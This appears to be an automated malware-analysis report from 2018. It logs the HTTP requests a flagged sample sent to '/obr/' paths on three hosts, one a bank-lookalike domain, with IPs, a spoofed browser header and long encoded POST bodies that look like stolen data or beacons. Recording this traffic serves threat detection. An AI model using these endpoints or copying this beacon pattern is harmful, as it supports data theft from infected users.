19BLhDSYcAXXUDd9BZL8x(JFZ9u2wgxx8TKqOyrrzBq2Xlco1SfP4QbfYpgZClU1Kf_e8c3ZrSS0pFIKHPKcwMJpkIlpLQGIbuTW4IJn8PgAq1RHVfrpTpt5kgKuySZckDb8LWh(nkmMOTKayiKcl~0ckcISrwQOihasZicOnNwHK~F1eJjIlR0IYiFfrlJBqg1LTXnAZP0SRbwHWop0_6ZTOJ5jkqC~tFOHKIS(HiGRiuO2H1-w5U7ykcorux0y3vI1jiRh-SEWtmlkaATlWBlONODmZSsdNKYHJSB8jC3wTGhlWlKsa3O3YuHHjnv8jJsKTFeCnSs9PEt9PkHK6Qml54U360m61h13Nb4pYzBZC72q_V44QKA0qiuwhecPCw9TTykSHJzMTt2T_C58zvuA3ZUgYSZWmHTGkr-DqasDjzbQlWuwPOx9R4s8jvUDDTF~2EpPqQYVQRs6VYFuN8um8tunle9P4xXYMWCnGgSDHkuvBFdHuzxApGdBTqzn3vk2kBjIguCLp8cNwd770xdvnHvHnQ8vOM6W9l3g2R5M6ltVJi1zG3ulu2F65UXzW0iS7XFvlMVoGHSnQXD7-OqqvUQzSKeKqmf9Xd_pBGBJdUeZh(LTVRT3n2E00aHm54iMoATHREx2Jh3PZfN9CVVg_Br4dlfUoCIW5qTN_I4t0lynBEUjJcLrxASZTEY9S8zMfIiSXpLlBf0zF5s6AiS76EnIXSik_67bH8kbQCvo8j6Y9s3KG8MnB(xZ61hsHRrHZtvQI4lI4sflDKSfDCUDHHa~klP(SGR~ol5m_trP4xK0ikzD4Cr~NWNdhXnVJv7Ome_eBtviW6A6olZzY3dhtPXHGgnr187I0yEQKj4xcw9hM~xAN(qrgWY3L1hYsRI~Q6n7vM7JGPrTD7roi9mB8qP8MuYBWjvc6xADsLzSPvEgx4V5oHdDSvf6Erm7UdRLDVdcvxidnnef9mqSUcXVvY9xKNB2RB8GKhs3mpA7FQIt47ceNVDPPuJa3qRaJUVlqpHRKbnDnHKTqc0yATZfXOTLr2r7i9m0b9fF6tBcD93vQry7rbXcvp9W1wNcbK321cHekFXR-eN7x(jALJgproUbLJx3bRJDlwQNr3thV5XZmOuu1Urwf(TcAMTAMYksxyEes5fszzy0T21kadI2f8uDMoL26NfUE~sISfZrDvVYzQFTJWqkzy-Rdfm4CkcTap5yqnzr6CE4EqOvEm6QFTSF_hu3OzOHLwWQ_j89SJLHaiftIxp17~Ng9uvwynXw03Ern0GK0SzflIGAwIyD2yQHpfSeBv0xfCzCPzYpjmJi2nxpeQyUyKOQvDK1uXpOyH2H_p203Ln4x4orxguN3SYFLyvFYOfgA~r03\x00_oEsaPJ

http://www.salientchurch.com/obr/
  • Hostname: www.salientchurch.com
  • IP Address: 208.91.197.194
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.salientchurch.com
Connection: close
Content-Length: 62439
Cache-Control: no-cache
Origin: http://www.salientchurch.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.salientchurch.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

mN642=oa7jcEBGRtc0bhCTRtjGma5af_znTomh11qNoff5pIZngUx91_Wo5aTgKQBGKxPSfBAu1vhAw8tPIHWZ~Y9NmR6KxUk_KyQ7MiKXdzi1(ugSL-nckJfFwwJ9TBI8qX2O9fF90jRVnlaSt_cIFAZBl2c9aKysfMQ-VDCfStyOA_1kbXg55Njc~cu33eX0ZMfmb6W7X53BSSHJx8WVtEGvIL(rLHAyT1TUyBETGfyqC1QKxC7Wypgt3vHcBvAbwy0_H9gHM9CNRtMClmy-bMJJLzRns7C59cQZUzYLFlU7usAn4TjsXS1XPzn-R5u4I8UnsVFYq-JT6-iht5Ry9n0DI69dJbffAyiGD8fFtjBJbtxRZGbObl1I(a0e9eKLQynXbDLTMCct2EyyjXLGsDe3N6zj2ahg6uPek1ki(4ftFQ8mLKE58CMtxBojEmsK(SzzdcrHb59EbHogBjtGcocXluBpa4MzW6~iTgVtVAG6o45qbKheCZ~J1-ztJ2JVIsGknjp7Y-kve5(V8G4xBZfntGPTLls-GFHZ0qtr1l9G4UuklTDtVl7zkpY9EVNSTLEMgVgDslxnh4ge05WAJXo02AKexVauvLUPHI5gnlqa5YXy3BbdEwQ6aclkbogb3xWp~JucC0hRWMFGWANh47Hll9G5QnTxjIAg4p2A~CXe91omcm0tC43wcYGMMSgcs3mtVTHYfCnurNAWwonxfmj9eepkDCZuQkxMccaie9d1wlZFXcyhQ894tquJ0CZBEe2Z~0o9~9EfjUHvE0Lz0yOucjgnD2Q0WnUzI7rh8AHbI0NKLyjQCd9GYqsC0pIXgd(bghFWdbXRj5DjKdCWj-V9YOvSS7jG~jMgwkpMC9H5UV5ndSBWDMm1AtZpfoh_NwQJDDNErCzMDquwHylP10j3FI943eBFgZW7YPFfMbZody6-uGQac-CQzLEi~F0raZee1j226r4P9sCGLBK56GI4ZhZzRUc6gBT-raZg7iPIR0gwCx(EZ1~63cQj77~5Yo7i(iKBdtjHLADixlwZ3uCrk8hYWr~vdpvCszffgfhwgCsIBm67pVYyGwl0IWiwJiuJe7JIBLmLRgkWXGkjSQBujI8_1fOcqEeinqNPJICTIO6nT-FPMINyqWH9QVBJ(0Tjzk~36WeKdrRVlzdbtDmxTqM-YiY_3_0kQMG94q~vyhOHIQ4FrW(GD9llmvIRYFMDWrzxS3uJlvzwcuTQttYadcRIIE097cs6nTT7SHWPE77cS5NJQvSiURyf0_fPvvC5W67u7HE7dz2HrFTF2NzJLfWH72w8KetbvAm_hnXSEApfngPe(O1mU5(ZztPoM8rqXMDpHYL2xyVHJ54uidsUt32298xGuGPEajqW1AznQXL9FCBGJnznXnnZL7KBWniQOsnQw9N2EucACAJaV-wrwq~YMmnv9AQpP3qFvzwYTxX3Cga6tH26cN8MbDIVJoYdlfMka4zhriR1IsZNm0bsCQzIbNW9DWBNcpZjrBJ8OFO5yY9nXkrN(oyQmS3UBTwUC3MV4M(a9U70Jf48hL4M2iXt9s(NxgJQ9CsDUrnrtqgW(EwzlvhAFSaDREjpC5yRgP3dbUacqIudoZH49YMm20zsceubQ6xtA1wR46LxePSV6LGK7gaKpI3W9ZdHYhDJ32fN(bMWqys816pP0d8A2wQz9arEU4Tq3RUYRNzm(0TiM6BBDarH4YJ4xE5JrN17p_NukLQEkCD3ERqf~0Q41EsDCYafu7~mqFe6RGK1VsNo0x8w77DWgYXqb2c3MfROGQ3lWuOduOrE9SfIX6Eg18yWU2LOur3G~witfSwJwV4UfSmcKqPrUEuGPr(uFDXa(P3q6lsYuO56oiUE03zOvST5UHBbkuPUipctCwbJdmeLHnp_eNjRkjADIDZRiy21CSD7doXL5SlwkcRXwHRmHsaTDqo-6QwrFzpVP0lNgVKh7dsx8lVPmVA1dYey5sXzgoaqC9Yzm_cXZ5(rsXdxF0rtbroPy_5ORAg_1dvfsJbw0Q38DVUtovq_2cB8bjJDvNnjydajzX0Gn-lwc6yMmMt4(btJte4jtLpv9Bkag3vU3WXWfS3lJVcfPifJ(jXbOV2isBB0P2yA66JLoZ~R4hsYJFAEINEZLbp9WPCtXF~gvlc5a0Upr6WTkuJXacBS8fgDaq8l4vJhAPcXVZYreY73x0q-8AKhDRISGxGJqw5YLUkqWe~P5mcvulA_y-HiMUwvLK1RT94UeREBeKo2eVXUn3QxnKItMyqV99MinycvIptdf9~QvkdNercXoknXwBxzm-7CHs9GRe(cDi8o8xdLX4qLgo6c~vfBBPLtrw(UbLpG(Z(qVFpD9JwXX6gMTxsqs-Xrbs3OpirNJnsVzj80Iudh33

http://www.phellowes.com/obr/?mN642=ewb1jfFPwBN/eCc3OLkjBef2WFHJRtyO65eOz3oAIYCOgIeaSK0CE71m7DhJy6Qgty176JsL&8p=ChrLW8nPhHRpT
  • Hostname: www.phellowes.com
  • IP Address: 219.94.128.196
  • Port: 80
  • Count: 1

GET /obr/?mN642=ewb1jfFPwBN/eCc3OLkjBef2WFHJRtyO65eOz3oAIYCOgIeaSK0CE71m7DhJy6Qgty176JsL&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.phellowes.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.phellowes.com/obr/
  • Hostname: www.phellowes.com
  • IP Address: 219.94.128.196
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.phellowes.com
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.phellowes.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.phellowes.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

mN642=WSXP94Y9py9AJEBAG9xpc46SBA(oHduUm8LP4lEgbK21kdnQXMY-Z-Ax8zpWn7U6uypQye9_pClmeTSsqOYx(IitN1n52ZIWKyy_WHKztQBJzC0mCDHAI9o_rSBGh14CmSBZM8aj0qjTQXPHpP9T1x0o0UMh5DYvdd1_~kbMSAkTDzH9QcVzzFYVmR56llXbb0hMjCCFwlht71GCRSafI9yka8itxOOoxXBMhANLo7yhPcKZ7uIUHlvIFcqTjRul7JaJVNtYjrBQZr3eTkGkBZNd2gFeHaDi1La0Mhjfj6PxxENYq-(CkU~J46LRIYJOvOe2siF248Caem2_Ve(0B1YzlGj_sxmDlsN-mHmpSEBPIeDP6eEYcTOMk0OHvHACd5PO29nKqNNZY83s5KV8E4hE4NqJzf(axF(m17MscCW89TQhxZIeLQig7n8iEplogXQftdJttVrMVhOKQ9tbdMKGeks5EIRYIb4aFM1KcxU-prL1nAuEE-JphBMPEoIfoX~dnAhxzD(FhX~J3Hm7k950EetOyYzUDSg8OWKzSw1deRL_RStel4OUB-4CD0mUGc1815RYdMifiiNoskoqK9EtYjtDr-U3Z68UOab4G19CM7VFn20SVXHpeNCygxNuvjwju9Sv~d8qyigYvhP9JLMkBG5GCSY_OEVB8zSZE6R1dKT-B3Y4susaeHQhAqcdequRNxpKzLZK7nLfyBviOZQTFkslYytYjAjlkH6fxvT5(NjwEqG6wewglYQJ8yaVRBSbzQmbbwmZoan0e9a8mk412DLb5XkxM9rzet~fWfIITj6Q78~7IhI8~_~MMJtHngG0r1Um5WIi77VghzeYtoHG6D7os1RcCRIGdah_PUF2~aS6OHntHBA0kgptA9h-3yNy2_dyRTyy(oOMhAugV73Wq1QXx72VurzQRRw6I8hS9skOeiGpTVUXR6IBZtc55moQDqq7qdiBE5jqQ4oSK5T7OCLiOaM-ZdY4Imz4B_Qac8wxmvbGCLQudbhBKaJbvi5aQRKnwE0E7-gVR4xHceeKrWtgRyjUFO5ylEfqpB2-3lfAg3AioJAj3sX0ph9vXjgBlYOb8t7JroAnXPEHJJWqGxOxcraruMXZmxkLV389m82fMhs3QwkNYGNnD1b1MxJ1ZBe7OjqVhk(ZMIOoY5Vpl6QpJ5MM10YReBnAwZ~AhatrbiU7dtwL8eA6TVP0XUOuLV7O6KNWC4oWbpx59DZGbWXKxHhvaY41mFG881rO6pLfj0yrdfbGsQBZR9Y2EzxuUJHQizNamfAnFpniQscGQtXcOAQ8h7ngSPTI(TZiiJ9EDv1qhREQkcJRtGQj5y5l0dHk7C(h15LIT-A8A3pJFXI01wfLDs0cy52o2roKHHm3bBsEzom-RPgRhvJ435V9oyRmir(rIIJHx-GEWBkma-EuqWE0K8pSmUSnpBODij5iTuy7xouYwpmkBemhB7NuxkMSSipJvox7v8mCtMhAuFlqWK1ANe8qkIv2oew6dLZVTJX10KLkRXpz1cluLXhGS9Syp7a7H2LUZJOpbNMIQvU3uhI5VnO11IdIxzAb1sNwM6w2M0Dx8A8NbFwf(B623vr46usj1krINSVDKJNB0y7oL7tT(9LvnnHdwjlIaHxCkEPXfhishlA3nqyk9uaaOumbqeh0(OjGrIntmLcGUSMfE0RAaaB0aWbZCCh2qglmPsXpT0zpHS07sLPDmeSqTzf2cxhV0wQTrSdvI7U_SoKPJThEru2SwzLPeQVprO(MctwcoueJFQkBMmzNqpUSGFVmJYRRM_gdQ56SDJC_s94inQYjmgYa9AgP2YnThed2V4C4sohWKxkaKkYuAiayAfODvUpe4e5jml0MdZRTE26DCfGmLq42DLIe~5dQZ6zGU2cAHQTq(RtPdNlH6Tq8fhQs70vRw1rwkeEkG5(NtUntxme5aBIS3MEXeR~lnT8T6h4dO8cy0KLYA1WKcpI1rzhpJQ~BBJA5Bsu4O7Wcd91QV3iJlpimIjqGvSUVG26RWBIKDCm3x0Jp3jEhIEdBgrAOvr1X6CScpcNKr9JFOMvVe2mdnzyBeNgapoHO1QC_qvd7T7q_Mvh9tizCSevkqti5~aLJxVquUo26yj02Ko5tMJAXrfUr0x~sPsEHjcnqapBomaTQ23WvbhNzXvQvZO8uRisT\x00vFYOfgA

http://www.phellowes.com/obr/
  • Hostname: www.phellowes.com
  • IP Address: 219.94.128.196
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.phellowes.com
Connection: close
Content-Length: 62439
Cache-Control: no-cache
Origin: http://www.phellowes.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.phellowes.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

mN642=WSXP964Pli5Rf2okC8hDYrjiUgziYfOrvMqc4l0sHICnvd3QVPw9U-Ay6zpVqbJaxw5uycRZpCdlKH2t78B5196BPx2lhLBkLX7gAy~zyQFHtAMhE3X2XN0ql2dLonhklxtdL-iLwp(mcV2uotccwBgr(zMn5hgdeYZnyA3fclMVGkyAQdQPp2AGuyZBiknhf3NM4SaV(FBvmFnFWF2iKNiJTdSq1fuv0VYL8yg9laKtHuDw7NkfYkflI72djhD767OBfP5jhcRMSZu3XHLnBo97xnReNp744uuvChixl6XlkUNwq-70injwyaKYMb8KquG-iGAz4O2afAzlTcnrOVZrs2TkmjyMlsdin3epTGlPCuTQ4eEYVzOOk0OPvHBod8zS19vKsNxbJdXm8ZIBI4hA0p~PirL-xGf-1awsITy_th4tm9cRBx6wwH15Ep5lhS1wp80psVrPexSjGMtXQ4DcCTICXIF-Z7sfCu1GSTwq8_jDxCiIAMROqhhMK51p63qrmhN_xAvThEnx2j(s4tEQP8oL3YD7HgBqICLvdSMcABHoGwZagcKFLsUcGRKJHv17~sRAeM~2mTRXo2UUc-sjRjhinesJMrEeK4bZFi9vWeIC6XYhQ1fTL-2KmQoFnn0hg4XR0eFA6RQunjDdNIUEASZeBQIOKlx64R3xAYdiV-LcMGkYpJ5LaRVADK0pXpeuE2lb1fAy8Sbn4TzJIpofG08XYlBijAr5l3~f2u357Mj3EJ~9~uwmhYQVxSW3RDyfyTKbdC~bpZOaUN~b50490CHE9XEmM-G6ZtDqEqcHB2uu48~8aw1K4_yFRZcinQCkig827UgytcBlq3~T7Ynsoz20ng57WgkATKxRE2lixb2EdCLbJi4f(RBMXZ5R6glu9MRHf0Kt3-aihkTzZa6K0lwUxpP6(rr1Qy8UR55Em9JPczqxYU8cQOUdZMQf9kcLXaShlMyeF4uRU7V8ZYqAOi~ND-INA-AuOVv_Scwnfc4Z77T9Mowyd5N7bI5Zn1QvJTCqjzk95sA5aq8qbvn2lmoCWznoYspZ1meErX6DiTvWkm8GkOMdyP7Zgjd_UUUOtOq8~PK5scIbc7FoZJvIEFSmLYi1uNnVmUMLF3E9lLCfCDokUFclY0YydQnCaCN3JUL7JxiY3h(MHJ2IOahXvuIaCagR5kQjZw(nwcqAkJYfLxQCcoBD8-ocB1uuARmcDF~uuOBIE6IlF_BN2w4BXCGk~2wvFK8dnB~g8kX48N2diyecVOub1zRlT-kvfTRwAJeQpA1orIYhXK7QJ9UsZeLzLmI0kLOqWtzBtENa~_8WE9NwsSg9kspgjX4L0gNo~5HYgjrL(5(iYe5VFVsxb0sA3lW8FNQ7zYO9160SB0bvTyAzzKGja-BIt4Rh8oRA(xRfpKasGYMNl4~NOhouGtRxiSg1cM16jEfesXLWk1BnfdiF8Ive~4C4OcGhB71q2EYiTV5Du5xso-G78eRUindWXPdzYOo1grbku9xgUM13Q5uCg770AGVNythvH2kRUOzsoKGTMFPUb4vWXoRZfu8rzhYDdCSHj59Ax2om1N1VBK0xRkGxvxcnQxIM8wCzzeTA1fkRwSnIVWV5DuVdqnriI6tt17a11ErnwT5cLFEdinX5Q0SqmB0niI6lrev5MOql~pRo5abZlIaxtKMkZCNaI00SbqNmaTfWOyRxqkpnaMPsSCXzL2QStJ2wwJ(5Dj(MThF0hmc6gyMrFqgHXuSHIywpvJeclkr8fhEm4NfiCLMNp4uyEkwAblDJ1eNuCBBbPY1vA90JR7yFaZO8rv47h2o3lhQu3BhqtqOXktsPW5u75INqD1ozF00rVme6L_(JtFleoNBgul4aZ41_am35f9uKPbVLCr4M9dp_fKKTU2lxMASA9zdbOIQzywuuLTsSv1TKxwnykuMkfL6kql~_j3aSThhTnccSfyCk3QMRz24LFN5q06jEWAu1EcwlhRtNVyrFNJV-GsCpVJG4cfQHVz(X58i6MTmfkHQgBWeLUVQzCgbExDFVqCpYMFovvbkusqQt~AbP~tJLhOJcOfn8NnGTkWCYGfAo~-(lqw2YiNd7HI2QFbRCgQzaDZPPpf~rwbHagWmGa4qd9zRyPutpEvsxkNg41SG3ZecGh7KANLdV(au06zKXShBcZZR8FZk-X0MbI9jundXQAjcNbJ1h0SlK16flIrqZ4z3zgx4X(YjWqzW0tXN6Z-o2ttcrbzlY4SY4cDBE1sLsrfi-MlEdULFsqxXDCyTZcUmdXJ3gXbOLRKQVGWux8zIQ1bVoC1ztHrWwISCE08IGMmKlWJjL2CePSsFMqJTN1b0-Q0cGxe0CAm4zYELK5VETMRbpjTwJpBVlSkq2~ddlI7y_fDt59z6qi6yNqa1175

http://www.bireyselqnbfinansbank.com/obr/?mN642=kAZYcjYqCPMtX5QsQnjoOuzokdlon9ygZQfKBzmu41EWN3Ul//+w8e+qrD+grZnFf1Cy5Qko&8p=ChrLW8nPhHRpT
  • Hostname: www.bireyselqnbfinansbank.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /obr/?mN642=kAZYcjYqCPMtX5QsQnjoOuzokdlon9ygZQfKBzmu41EWN3Ul//+w8e+qrD+grZnFf1Cy5Qko&8p=ChrLW8nPhHRpT HTTP/1.1
Host: www.bireyselqnbfinansbank.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.bireyselqnbfinansbank.com/obr/
  • Hostname: www.bireyselqnbfinansbank.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.bireyselqnbfinansbank.com
Connection: close
Content-Length: 2199
Cache-Control: no-cache
Origin: http://www.bireyselqnbfinansbank.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.bireyselqnbfinansbank.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

mN642=siViCD4tbdQlOewLVSmlZLTyycFtpd6jBELYHWWW4kZeCCsC0LWLgYr5sWzC5o7HGXCp41gs11A6i7bh9xjSZ04D4ylrWv6Vy3aWqTKQIBTl64MZV6dd1rBFzpZz2XefYBIDj_7WJM6WJyah1ZVAsl22L4(bxyskoW7x5_RCXbs2zB7T3MCK~N4UIwrVIqUaFfZnfCktQOSc8ii5nLVPjIxRHKRTYhyuBj43hWt66k7yPCSQboFLDtmlxhVf96ukmc~HHRd9G_HztkSxmqfW1eeBRoGU1-iA~k6AvWGPuWjW6l2ToPku4XwP5vgLpOkZyamq9l5xQ4Q6TWv6YrP3WvCr9ry6roMQfjm31_ewkuE-Z7v1cO~F0-Oedu2XlWf7kMXgYmiJWhhI1otYZDGSdy7bXbnZCOCZUUXj3YonkfWzAs6tV3OGo_vsp04rFRpc08TkCuHC9-XQ6rh20a2gzwasq-At~tAniJH3(47l7GsG9EH5oGz5orx5J2~UkbtWY7lE(xoYUxdAphPGusl3xYS4KBUg(GE-UuKexuP3qmec9FAsku8VKyjlQ38Q3R1LAg69kDxzWuOZZ4Hk3FHy0825Id3Qi9QLK-Qvg_pYN9~IA9hLO92DLgSHw6y8z8~6JDWHnleBoiuCLaFv7UNqgC9I0Im3ObQb0kTkhAfQxK9Mcx3vhJ41je(Se3fcsAJRWKnUFtrU6XYk~gg5ak8CtueypF3YEFQWQ6pU7_YOX5If3HwEnVs3FoFlcpzbR03pgClfF2uofZfAOX6_EErLXY8Npu3HqHEN309ybIK44GqcwgMY2-e7j9fCoA~kfxF_FPGzE7~0UFSJGAMztCDn2yafHGiTNCKiKxrZvDjm1A~w9xnisT(MqDvycCgAV92Jb-hCEI895dm1s8mQ~AnfYS6me_149hA8goLLlxZsvBdnkhedoMgo2m78eOpIZiz-DACvpmok4kFRb1BNiK40Dz0GM6QWKEKDbcn1B57sHKO2xZBRCaSLK_BcozVjBSMa5scoJEo4aB0OGp4MO09wseyb9U3lT03ymm~JBhzZxj2Kj_LuoOlGRZfJ(ujCNfQ9rpd7udL6UP6eQ75hWNl9ZKzkqJ7qWFQamEAkgxo-(Apm8TPIyTyNWQBexePbizdpmOwKX1pGMG39cYx4BP6TWIVsukdC31fiGR~SGcKlUSY8LXwWvX6GRgEf99bdtEkf8EGK4db72tBZPMw1lyeHWzPl(tg_WngcvIwirx551AX0gs7UvY4uhFbChP2IPv0K89fFyewx7yjt8G6dTtZl705JRRyZy-egG4Nur7JFsVWRSkpGLy76pzNJzMgbqqY6YymWzp~DUUcSTtd7MCwwg37iaeKMta~lddZDkQiKIKfiXs8Mna1g8IemqkZSOSMIAvmVHWpvxzfZSY1Ks0vqNzla2vl4B4Your~Sir8OLT5x5vEf8f(0AlDpCa~dM5r52shAMRaxogMLYoer6EpzTJHKrYl3kzd34jebLNPMGOSkG5Q7u70wrpt6PFyHLWHQ4ZHHs3BgxPIB4WRI(IMza1vMkih1x9s9UphBHOmp3VqxYRNCGXfkSrMXFvShikcpP77Cf0paWQETqOzZqCrof0M5wdr1wlcL5vI7jMSiAbHPa9f7A57tyV5kh4RZTBhw42v6dC9BjanhnAVnUbZdCefC2oFP1QoGB0aRmPwuCtIaB-tc1TMU9XJgQoW_F6uy6e6CBhuf7sYRyPc-u0UnWe3AYwSGha62wKfghMqIGACuEKGeiXTtmKyVUGrs5TfAS49oY1FvZA87NT7tpKdTd3986jYIg4eT4t5TkT~Rs6K3eo4YAeOPDaLDsaAxqwUhSfZlLHmqxQZAENp-7EZdVcGyXNzUnrvukyOcl8zQs43Rc_ydsRy3O7VNQ-hvi1pBuLUScevFeTbcdqmuYuCQJPxDeAMew7kZBORyr6tSRnP9TZI8jM8NpNmpgRx1k_V4keZ9qESR47HFLug8Xl4w2FLE7Deu7B4ed0amQbrVLrOC870Hzb0acyagrg~IBfo1LEo7ZOva8J9OchJXR_fVZo6zhl6pVxFkHsEnD21jx_grrb2rvZv3Oh6ZxG1HkEiGXg~GRiF-(lMwiNCDRUSm8rcClfnCoE2TafXfKwi1olqbNw4c7IKiIHgf5LIhxokSAFRkxYeRd4dp\x00pfnRe\x00\x00

http://www.bireyselqnbfinansbank.com/obr/
  • Hostname: www.bireyselqnbfinansbank.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /obr/ HTTP/1.1
Host: www.bireyselqnbfinansbank.com
Connection: close
Content-Length: 62439
Cache-Control: no-cache
Origin: http://www.bireyselqnbfinansbank.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.bireyselqnbfinansbank.com/obr/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

mN642=siViCGdcZtEOKdIeRRuLdo6KqcRdgvq2bWSLHWGKt2gTIC8CyJuAtYr6n2zD9o3_PlSb4wZx11I12O3osz6KDE14wSx2Sq~UyVnJvX~QVBnnnbkeTLRB9rdDr9F2vUn9ZnwH1rj6DuqMFxD00_xMz1i1fqDZxVVTtUCy1fYEWecw2TDl3NGzmdoHHT7uXJN4BYBnSTNqIZeeg0jkq6VYqZB8PrBeWRToGmsnvX4M4lD2FwKCdLpQKcX14C1K~rChleqPJTJwEMr_mRmnlMTO1qivYPaUnuCa(hO2iWGz9FTaj12BoPQ25hUl8vgRnsAw5eKMk3gpRJA6T03pPda3KfCkwbjg6rkbfnCj0Pmw2Y0-OLfya-~F~eOcdu2flWfGkJDaZmaJdC1K1ZNobQbjYS7tD-SMGKy1UXnB340n3-yyQNqpUlmJnfb8nUg7FRlFz9CFU8Tp~-XTiLNDwfWs0kf3o_IG8dUJjq6m6v3f4EYSkUTDjU(lobBOeHiM6_1lZbh-uAkKcQlKoUL2tNQ2upetCigIpXURQfDMx9SgiCuI3Fc_t4lXYGvOKRsenAFOHWv38gx2bOLHPJ7t2n6TxqCZI8a_qY8TRsQTlYdtcubqNoVTCMKgdzax65Ky1c67FADMjzabigmZS9J4kkoF~xlG1Y6RC7YurUHHsCbLyYxfF0OymZVik9n0dju1vlVhKZ3rJrDJ4Gdc4QEVfTVe5NOhg1HQEVhCQ6hi7PsOW5cfzEYHn0ssSoFvQ5zHfUqMgEoAG2qoOezCPUiPOzD8TY8VrsDcuGl73yNuaI2ozmPKg15T6eeCltjQ4xCXAhVFE_CjWJ6eFjmZQD0yog~vyz6lV2uBHWbISj(Tr0P29hm84RzU(inUnhGsVj5SfMDDWvReUpcE~rK8mtG-(iLpUx~Nb-o49yIAxoD6jiVCgSYg90uJpdN1z3iVe6xcbGChUi3_gGM-hEQTawpxmJEZEi9gMacsGgvNVPf7NoioGZubx4JLdLuoO6UzpWlZHzIYw_BTQipGbQwvH6I0Bjslqo(28EzAdVjatEuiSCCLz1Xsz5zBj_piCqfRotOiEeYtj-J-mL3dEbW_RuR3MYNgN4yw5tnLHWJ0mHJbjTU-~Qhm9AHI726jLRMH2sL7rDpess0EEHAYflf2Yak8V6OrTaRC5FJJumT7HR2kAsisUQI8FQRst3HmQhJA7dTRi1EIuh3L6Z3WiMx9JLFhgxC4ZB~8~cNZZUoRnIcGszQJyR7ClP7BueEJpVOdpeOeNvgbw6TX6OEsvxb5wRifE-Ft125jZWCMuNyoDI1tm5Z2pyKHeHcsCADWiwYZncAuk4VZJRih4IK_ZFI0XOBWGi4csx7tYteShorQXvVklxabYP3Ue70h48Rt(sK_u15GCBYZEejpDg1C~QTNcIxHsX~wYTQVztg9I5Ip4bz1wP0cJDQa1pUa7JaXDlDCY5OBZsf52sZMBR(1m3UFBcKSq25vbovP9LsQpRpxtzaEBPLsEu7zM4QZjrM47b1qZ1m5d0rRuMvhvGZLw8A5hXdI98xRYHH4kC5X7uEHfKRNCPGh3WO2ZxUce3qsQLIKHuyfnAldI7zZRg9mdh892o(ZtwP3QTUt5_u0zm0P3tcon-(PHrr9burnCZad9E9u3oICWjob1WqXfnl_7NPliWgwZbVMaPPgl4EO6TlkCkXImL8POaEdB7Bb9i0H8lY6JauGE5m6td6-GBP325FP4tUtnVk6YKOjd2aOh4TVg7fQjOv8UByGTrP97xG22MiuU0Gu(h(-HfNRLncZbCgzATHsoIVEUXx76ygvhaS5o8wwqQWzlcf0LKIqDbGKJujFzIwYyUsufK1XcH2t8BVAP-R54klLefHrL-Wuq6uTgDSqu-amudL-dPbIsRaHVbU4XdBaqXR82dM2R6n_Vin6ep(IEOKQHMUqPAVOlLQ6Z5Nusa1xREzwVcs-6tgbsdzzgBZIj-pHs91wzjmP3JDAOOcQWkFw8FDs6iiW7AABWXuLHbnMOYSr~LBGyJAnGVSUsWr9e6BKWWkKffr69IYlBzBpEvbKKvGmhyGHfhl2AOw5bkFRqsUY2bqMn933W3S21SFSp3DFSQylEQZFgQg717S4XkORj7AZ7tX05UL8SKvIFya8ilKcMTQajJqoeW5L3-Ir~NxQGHQ0zeDKe4ohUZ45Bsvis8mA49DyNgFZQESHjGmtJ0mTNtvM6HHfoMYZb3Qn6oIMC5dXu4iXIcHK1MB5iViuEXkzmVcObcXPCYgH11~W0IhP7Eh02R0woh1aDoHuIfTzRNlZVhbqi_RdwFYPRv4xhypf9Q8LkGAGB-L21_eo6xXvLveA~v(VuXvzE44WnrgE9zJFR0

#infosec #automation

TheSystem Itself @ 2018-04-27 09:27:05

Detected family: #Malicious

TheSystem Itself @ 2018-04-27 09:32:02